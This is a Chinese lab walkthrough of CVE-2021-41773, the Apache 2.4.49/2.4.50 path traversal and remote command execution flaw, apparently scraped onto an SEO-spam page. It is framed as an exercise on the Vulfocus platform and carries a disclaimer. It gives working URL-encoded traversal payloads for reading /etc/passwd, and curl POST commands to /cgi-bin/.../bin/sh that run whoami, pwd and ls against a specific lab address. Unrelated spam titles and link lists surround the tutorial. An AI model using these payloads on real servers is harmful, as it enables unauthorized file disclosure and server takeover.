当前位置: 首页 > news >正文

公司网站建设哪家好微信营销软件排行榜

公司网站建设哪家好,微信营销软件排行榜,wordpress手机版难看,电子商务网站开发课程设计论文本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 前言: 本文主要讲解apache命令执行漏洞(cve_2021_41773)。 靶场链接:Vulfocus 漏洞威胁分析平台 一,漏洞简介。 cve_2021_41773漏洞…

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

前言:

本文主要讲解apache命令执行漏洞(cve_2021_41773)。

靶场链接:Vulfocus 漏洞威胁分析平台

一,漏洞简介。

cve_2021_41773漏洞是一个目录穿越的高危漏洞,主要影响版本有:Apache(阿帕奇) 2.4.49 和 Apache 2.4.50;其对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

二,poc。

具体poc已给出:

get传参方式poc为:

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

可以看到是一段经过了url编码的内容,解密后为:

2,post传参:

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

经过两次url解码后,结果为:

三,漏洞利用。

打开靶场连接后,可以发现是一个阿帕奇服务的默认界面。

通过抓包后发现,传参方式为get:

此处使用get传参的poc。

进行攻击测试(poc填写到红框内):

可以看到,回显为修改请求头所读的敏感信息。

此处为什么要用burp,因为浏览器自动对路径进行了一次url解码,用burp发送过去的请求,不会被自动解码

‍四,rce。

1,查看敏感文件。

在kali上使用curl 命令进⾏进一步渗透工作。

读取敏感文件的命令为:

 curl -v --path-as-is http://[ip]:port/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

① [ip] 替换成被攻击服务器的 IP。

② port 替换为被攻击服务器端⼝。

curl简介:Linux命令行工具:curl详解(与服务器之间传输数据)_curl socks5代理-CSDN博客

2,通用操作。 

具体格式为:

 curl --data "echo;shell" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 

替换shell为想要执行的命令。

取得敏感信息,查询一下当前用户:

 curl --data "echo;whoami" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 

查看一下当前目录:

 curl --data "echo;pwd"  http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh       

获取flag:

curl --data  "echo;ls /tmp"   http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 

http://www.ds6.com.cn/news/99018.html

相关文章:

  • 建站平台隐藏技术支持自媒体培训学校
  • 用什么工具做网站视频号视频下载助手app
  • wordpress在线播放电影绍兴seo推广
  • 做恶搞网站软件有哪些开封网站推广公司
  • 客户关系管理的内涵seo整合营销
  • 东莞微信网站建设怎样web网页制作成品
  • 网站做多大尺寸网络广告营销策划方案
  • 2018做网站前景如何大一网页设计作业成品免费
  • 另类投资公司网站建设规定东营优化公司
  • 新手做网站设计关键词搜索指数
  • 服务型政府 网站建设优化策略重庆关键词优化服务
  • 可以在自己的电脑上做网站吗有效果的网站排名
  • dede怎么做双语网站深圳优化seo排名
  • 互联网公司有哪些部门陕西整站关键词自然排名优化
  • 网站建设要注意哪些事情什么平台发广告最有效
  • 找人做网站会不会被偷网站技术外包公司
  • 那家做网站好长沙快速排名优化
  • 怎么才能登网站做外贸珠海seo排名收费
  • 做网站可以临摹吗文明seo技术教程网
  • 微信代码小程序seo教程网
  • 河北网站建设公司如何能查到百度搜索排名
  • 简单网页制作教程视频合肥seo网站管理
  • wordpress菜单注册seo怎么做教程
  • 如何建网站百度资源提交
  • 大型门户网站有哪些win10一键优化工具
  • 常宁做网站怎么注册百度账号
  • 资源丰富免费的网站推荐排名茶叶网络推广方案
  • 怎么用自己主机做网站、河南关键词优化搜索
  • 怎样管理一个俄语网站郑州seo排名第一
  • 怀宁县建设局网站淘宝app官方下载